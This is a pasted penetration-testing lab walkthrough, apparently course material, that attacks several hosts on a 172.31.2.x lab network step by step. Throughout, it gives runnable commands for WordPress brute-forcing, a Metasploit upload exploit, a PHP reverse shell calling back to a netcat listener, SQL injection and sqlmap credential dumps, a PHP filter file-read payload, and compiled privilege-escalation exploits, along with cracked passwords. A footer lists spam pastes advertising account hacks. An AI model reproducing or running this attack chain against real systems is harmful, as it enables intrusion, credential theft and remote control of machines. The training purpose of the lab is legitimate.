wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
-----------------------------------------------------------------------
 
 
 
 
 
Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
---------------------------Type This-----------------------------------
msfconsole
 
use exploit/unix/webapp/wp_slideshowgallery_upload
 
set RHOST 172.31.2.117
 
set RPORT 80
 
set TARGETURI /bull
 
set WP_USER bully
 
set WP_PASSWORD Bighornedbulls
 
exploit
-----------------------------------------------------------------------
 
Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then from the lab network attacking other students.
 
 
---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
 
tar -zxvf php-reverse-shell-1.0.tar.gz
 
cd ~/toolz/php-reverse-shell-1.0/
 
nano php-reverse-shell.php
-----------------------------------------------------------------------
    ***** change the $ip and $port variables to a host that you have already compromised in the network
    ***** for this example I chose 172.31.2.64 and kept port 1234
 
 
---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------
 
 
 
Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
--------------------------Type This-----------------------------------
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
 
-----------------------------------------------------------------------
 
 
 
Set up netcat listener on previously compromised host
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
    webmin1980
 
 
nc -lvp 1234
-----------------------------------------------------------------------
 
 
 
 
---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------
 
 
Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id
 
/sbin/ifconfig
 
python -c 'import pty;pty.spawn("/bin/bash")'
 
---------------------------Type This-----------------------------------
cd /tmp
cat >> exploit2.c << out
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/
 
**************hit enter a few times *****************
 
---------------------------Type This-----------------------------------
out
 
 
gcc -o boom2 exploit2.c
 
./boom2
 
id
-----------------------------------------------------------------------
 
 
 
 
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.181
-----------------------------------------------------------------------
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 
 
---------------------------Type This-----------------------------------
sudo nmap -sU -p69,161 172.31.2.181
-----------------------------------------------------------------------
PORT    STATE  SERVICE
69/udp  closed tftp
161/udp open   snmp
 
 
---------------------------Type This-----------------------------------
sudo apt-get -y install onesixtyone snmp
 
wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
 
onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
----------------------------------------------------------------------
Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
 
---------------------------Type This-----------------------------------
cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
 
onesixtyone -c snmp-community-strings.txt 172.31.2.181
 
snmpwalk -Os -c public -v 1 172.31.2.181
---------------------------------------------------------------------
 
Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
 
Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
 
Try to SSH to the box using the credentials eric:therisingsun
 
 
---------------------------Type This-----------------------------------
ssh -l eric 172.31.2.181
     therisingsun
 
id
cat /etc/issue
uname -a
cat /etc/*release
 
---------------------------Type This-----------------------------------
cat >> exploit.c << out
 
**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/
 
 
------ hit enter a few times ------
 
------ then type 'out' ----- this closes the file handle...
 
 
 
---------------------------Type This-----------------------------------
gcc -o boom exploit.c
 
./boom
 
id
 
 
......YEAH - do the happy dance!!!!
 
 
 
How to go after 172.31.2.238
Reference: https://t0w3ntum.com/2017/01/07/baffle/
 
 
---------------------------------------------------------------
sudo nmap -sV -p 3260 172.31.2.217
 
 
sudo apt install open-iscsi
 
sudo iscsiadm -m discovery -t  st -p 172.31.2.217
 
sudo iscsiadm -m discovery -t  st -p 172.31.2.217:3260
 
sudo iscsiadm -m node -p 172.31.2.217 --login
 
sudo /bin/bash
 
fdisk -l
    ***** look for /dev/sda5 - Linux swap / Solaris *******
 
mkdir /mnt/217vm
 
mount /dev/sdb /mnt/217vm
 
cd /mnt/217vm
 
ls
 
cat flag1.txt
 
file bobsdisk.dsk
 
mkdir /media/bobsdisk
 
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
 
/mnt/217vm# ls
 
cd /media/bobsdisk/
 
ls
 
cat ToAlice.eml
 
file bobsdisk.dsk
 
mkdir /media/bobsdisk
 
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
 
/mnt/217vm# ls
 
cd /media/bobsdisk/
 
ls
 
cat ToAlice.eml
 
file ToAlice.csv.enc
 
file bobsdisk.dsk
 
pwd
 
mkdir /media/bobsdisk
 
 
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
 
ls
 
cd /media/bobsdisk/
 
ls
 
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 
ls
 
cat ToAlice.eml | grep flag
 
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 
ls
 
cat ToAlice.eml
    ***** look for supercalifragilisticoespialidoso ******
 
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 
    supercalifragilisticoespialidoso
 
 
ls
 
cat ToAlice.csv
 
-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
 
-----------------------------------------------------
 
The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  -- view source
 
Found this string in the source:
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
 
------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----
 
 
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  -- view source --
  -- Nothing in source --
 
Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  -- view source --
  -- Nothing in source --
 
 
Tried a PHP base64 decode with the URL:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
 
------ https://www.base64decode.org/ -------
Use the string found here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
 
-------------------------------------------------------------------
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>
 
 
 
 
 
============================================ Attacking another server because I need a reverse shell =========================================
---------------------------------------------------------------------------------------------------------------------------------------------------------
 
Attack steps:
-------------
 
 
 
Step 1: Ping sweep the target network
-------------------------------------
 
 
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
 
 
 
- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238
 
 
 
Step 2: Port scan target system
-------------------------------
 
 
---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------
 
 
 
-------------Scan Results--------------------------------------------
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
514/tcp  filtered shell
1037/tcp filtered ams
6667/tcp open     irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------
 
 
Step 3: Vulnerability Scan the webserver
----------------------------------------
 
 
---------------------------Type This-----------------------------------
cd ~/toolz/
 
rm -rf nikto*
 
git clone https://github.com/sullo/nikto.git Nikto2
 
cd Nikto2/program
 
perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------
 
 
Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------
 
 
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
 
perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
                  or with dirbuster (dirb)
 
---------------------------Type This-----------------------------------
git clone https://github.com/v0re/dirb.git
 
cd dirb/
 
./configure
 
make
 
dirb
 
./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------
 
 
 
Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
 
 
..... really didn't get much from here so we just opened the web page in a browser
http://172.31.2.64/
 
.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc
 
....clicked on documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/
 
....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/
 
Tried the sql injection described in exploit-db:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
 
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
 
 
 
Tried to run sqlmap against the target
 
 
---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
 
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
 
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
 
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
 
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------
 
 
 
FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
 
 
 
---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
 
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------
 
    username:   webmin
    hash:       b78aae356709f8c31118ea613980954b
 
https://hashkiller.co.uk/md5-decrypter.aspx
   
    hash:       b78aae356709f8c31118ea613980954b
    pass:       webmin1980
 
 
ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
 
 
 
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
    webmin1980
 
id
 
cat /etc/*release
-----------------------------------------------------------------------
 
 
 
....tired of not having a real command shell...
 
 
---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
 
 
cd /tmp
 
pwd
 
 
cat >> exploit.c << out
 
**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/
 
 
------ hit enter a few times ------
 
------ then type 'out' ----- this closes the file handle...
 
 
 
---------------------------Type This-----------------------------------
gcc -o boom exploit.c
 
./boom
-----------------------------------------------------------------------
 
 
------------exploit failed, damn let's try another one ---------
 
 
 
---------------------------Type This-----------------------------------
cat >> exploit2.c << out
 
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/
 
 
out
 
 
gcc -o boom2 exploit2.c
 
./boom2
 
id
 
 
......YEAH - do the happy dance!!!!
=============================================== Now back to the previous server ==============================================================

Public Pastes

⭐ Binance Account hack QK
JavaScript | 2 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 3 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 11 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 12 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 19 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 20 min ago | 0.17 KB
⭐ FREE giftcards method ON
JavaScript | 28 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 29 min ago | 0.17 KB